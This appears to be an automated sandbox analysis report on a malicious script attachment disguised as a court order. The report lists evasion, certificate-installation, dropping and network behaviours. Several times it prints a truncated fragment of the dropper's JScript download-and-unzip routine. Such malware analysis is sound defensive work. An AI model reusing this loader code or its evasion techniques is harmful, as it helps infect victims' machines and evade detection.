Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: String function: 00440BB0 appears 172 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: String function: 004048A4 appears 48 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: String function: 00448F80 appears 34 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: String function: 00430AD0 appears 31 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: String function: 00413950 appears 212 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: String function: 004333A0 appears 119 times
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: String function: 00433B10 appears 46 times
Reads the hosts fileShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: CourtOrder_845493809.wsfInitial sample: Strings found which are bigger than 50
Potential malicious VBS script found (suspicious strings)Show sources
Source: Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.
Source: Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.
Source: Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t.

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: sync.exe, cmd.exeBinary or memory string: Progman
Source: sync.exe, cmd.exeBinary or memory string: Program Manager
Source: sync.exe, cmd.exeBinary or memory string: Shell_TrayWnd
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: sync.exe.0.dr

Anti Debugging:

barindex
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00401170 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,5_2_00401170
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_1_00401170 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,5_1_00401170
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\wscript.exeSystem information queried: KernelDebuggerInformation
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00415857 rdtsc 5_2_00415857
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00401500 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_00401500

Malware Analysis System Evasion:

barindex
Contains functionality to query local drivesShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00401630 CreateDirectoryA,Sleep,system,system,GetLogicalDriveStringsA,lstrlenA,GetDriveTypeA,lstrlenA,ShellExecuteExA,WaitForSingleObject,GetSystemWindowsDirectoryA,tolower,tolower,remove,time,srand,rand,malloc,fopen,fwrite,fclose,fopen,fopen,malloc,malloc,fwrite,fread,fwrite,fwrite,free,free,fclose,fclose,remove,_chmod,remove,remove,remove,system,system,system,5_2_00401630
Checks the free space of harddrivesShow sources
Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00415857 rdtsc 5_2_00415857
Contains long sleeps (>= 3 min)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeThread delayed: delay time: 3000
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeThread delayed: delay time: 1000
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Found large amount of non-executed APIsShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeAPI coverage: 3.1 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\wscript.exe TID: 3152Thread sleep time: -240000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3152Thread sleep time: -60000s >= -60s
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe TID: 3360Thread sleep time: -3000s >= -60s
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe TID: 3360Thread sleep time: -1000s >= -60s
Accesses Audio hardware information via COMShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_004356C7 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,5_2_004356C7
Stores large binary data to the registryShow sources
Source: C:\Windows\System32\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.24.116.148 80
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.27.127.62 187

Language, Device and Operating System Detection:

barindex
Contains functionality to query local / system timeShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_004D1780 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_004D1780
Contains functionality to query windows versionShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_00413770 GetStdHandle,GetFileType,_vsnprintf,GetVersion,RegisterEventSourceA,ReportEventA,DeregisterEventSource,MessageBoxA,_vsnprintf,WriteFile,5_2_00413770
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exeCode function: 5_2_004156B0 cpuid 5_2_004156B0
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 348744 Sample:  CourtOrder_84549380... Startdate:  23/08/2017 Architecture:  WINDOWS Score:  96 0 wscript.exe 1 15 main->0      started     5 sync.exe 3 main->5      started     7610reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 7610sig Accesses Audio hardware information via COM 7780sig Installs new ROOT certificates 6060sig System process connects to network (likely due to code injection or exploit) d1e1000597reduced Connected ips exeeded maximum capacity for this level. 1 connected ip has been hidden. d1e1000597 sm.uploads.im 104.24.116.148, 80 CloudFlareInc United States d1e1000598 image.ibb.co 104.27.127.62, 443 CloudFlareInc United States d1e981313 2 similar packets combined: image.ibb.co d1e7487 sync.exe, PE32 0->7610reducedSig 0->7610sig 0->7780sig 0->6060sig 0->d1e1000597reduced 0->d1e1000597 0->d1e1000598 0->d1e981313 0->d1e7487 dropped 2 schtasks.exe 0->2      started     11 cmd.exe 5->11      started     7 cmd.exe 5->7      started     14 cmd.exe 11->14      started     16 net.exe 14->16      started     process0 dnsIp0 fileCreated0 signatures0 process2 process14 process16 fileCreated2 fileCreated16

Simulations

Behavior and APIs

TimeDescription
11:20:02Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:24:00Run new Task: sync command: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe

Antivirus Detection

Initial Sample

SourceRatioCloudLink
CourtOrder_845493809.wsf36/58virustotalBrowse

Dropped Files

SourceRatioCloudLink
C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg18/58virustotalBrowse

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
CloudFlareIncMixVideoPlayer.exeb7f643f3db49c624e51335c2ee51408291018c8a0507581a024c0a452a26efb1maliciousBrowse
  • 104.31.93.137
9Delivery-Details.jsddb0955484e036672b7f92fa6576364357a568eae8609115fd741c220eb55803maliciousBrowse
  • 198.41.214.183
25ghrdhhahznt.exeb9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98maliciousBrowse
  • 104.25.38.108
internationalprimopdf.exe600408029d622447c7bab40a0de9c67b35037fa1c0fa69b7f24e06f8f75ef181suspiciousBrowse
  • 104.16.4.133
80aqulasmuts.exeb9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98maliciousBrowse
  • 104.25.38.108
verschickt Artikelnummer via DHL.pdf.exe7e4f213497690234e042903ff82932e785744fb1d17019a9dc502a53c072b107maliciousBrowse
  • 104.16.40.2
Magno Player.exe2f102af1783c4b6c396fd4b8a43658ae54db6355a9bbd89b9cc05b7475d7efb1maliciousBrowse
  • 104.31.92.137
81xeuvrqvaews.exeb9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98maliciousBrowse
  • 104.25.37.108
salesforce.com.doc97266ce01e32cca96d55a0b5bc562f8c756d4f2147e1bb618c5769a2e227f020maliciousBrowse
  • 104.16.38.47
1Delivery-Details.jsc97db996f24f752f916efb7ba020c80be65bc7c364fa2b5f351cbebfd700091amaliciousBrowse
  • 198.41.214.186
27gmhsmxougsnk.exeb9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98maliciousBrowse
  • 104.25.38.108
Quote #9907L.doca49705d9325ce8d87b1f24e92a3b64164ab0051eb3efbc0fc775d579959d9a62maliciousBrowse
  • 104.27.195.88
Quote #9907L.doca49705d9325ce8d87b1f24e92a3b64164ab0051eb3efbc0fc775d579959d9a62maliciousBrowse
  • 104.27.194.88
89MV RAYLEIGH Agency Appointment_Vessel#U9Particulars.exea6b1fe7f3748af3f566be9b03c8f6f26c962e9a4c351324e9d29d6e97e5a9e28maliciousBrowse
  • 198.41.214.184
21guarjlzihlc.exeb9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98maliciousBrowse
  • 104.25.38.108
CloudFlareIncMixVideoPlayer.exeb7f643f3db49c624e51335c2ee51408291018c8a0507581a024c0a452a26efb1maliciousBrowse
  • 104.31.93.137
9Delivery-Details.jsddb0955484e036672b7f92fa6576364357a568eae8609115fd741c220eb55803maliciousBrowse
  • 198.41.214.183
25ghrdhhahznt.exeb9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98maliciousBrowse
  • 104.25.38.108
internationalprimopdf.exe600408029d622447c7bab40a0de9c67b35037fa1c0fa69b7f24e06f8f75ef181suspiciousBrowse
  • 104.16.4.133
80aqulasmuts.exeb9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98maliciousBrowse
  • 104.25.38.108
verschickt Artikelnummer via DHL.pdf.exe7e4f213497690234e042903ff82932e785744fb1d17019a9dc502a53c072b107maliciousBrowse
  • 104.16.40.2
Magno Player.exe2f102af1783c4b6c396fd4b8a43658ae54db6355a9bbd89b9cc05b7475d7efb1maliciousBrowse
  • 104.31.92.137
81xeuvrqvaews.exeb9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98maliciousBrowse
  • 104.25.37.108
salesforce.com.doc97266ce01e32cca96d55a0b5bc562f8c756d4f2147e1bb618c5769a2e227f020maliciousBrowse
  • 104.16.38.47
1Delivery-Details.jsc97db996f24f752f916efb7ba020c80be65bc7c364fa2b5f351cbebfd700091amaliciousBrowse
  • 198.41.214.186
27gmhsmxougsnk.exeb9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98maliciousBrowse
  • 104.25.38.108
Quote #9907L.doca49705d9325ce8d87b1f24e92a3b64164ab0051eb3efbc0fc775d579959d9a62maliciousBrowse
  • 104.27.195.88
Quote #9907L.doca49705d9325ce8d87b1f24e92a3b64164ab0051eb3efbc0fc775d579959d9a62maliciousBrowse
  • 104.27.194.88
89MV RAYLEIGH Agency Appointment_Vessel#U9Particulars.exea6b1fe7f3748af3f566be9b03c8f6f26c962e9a4c351324e9d29d6e97e5a9e28maliciousBrowse
  • 198.41.214.184
21guarjlzihlc.exeb9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98maliciousBrowse
  • 104.25.38.108

Dropped Files

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
unknown11Evaluation and Quote.jar1c097d4143ab4d5ef840fe2d756cb26533f6cfd84c76a9ac2eac1efa212130a9maliciousBrowse
    11Evaluation and Quote.jar1c097d4143ab4d5ef840fe2d756cb26533f6cfd84c76a9ac2eac1efa212130a9maliciousBrowse

      Screenshot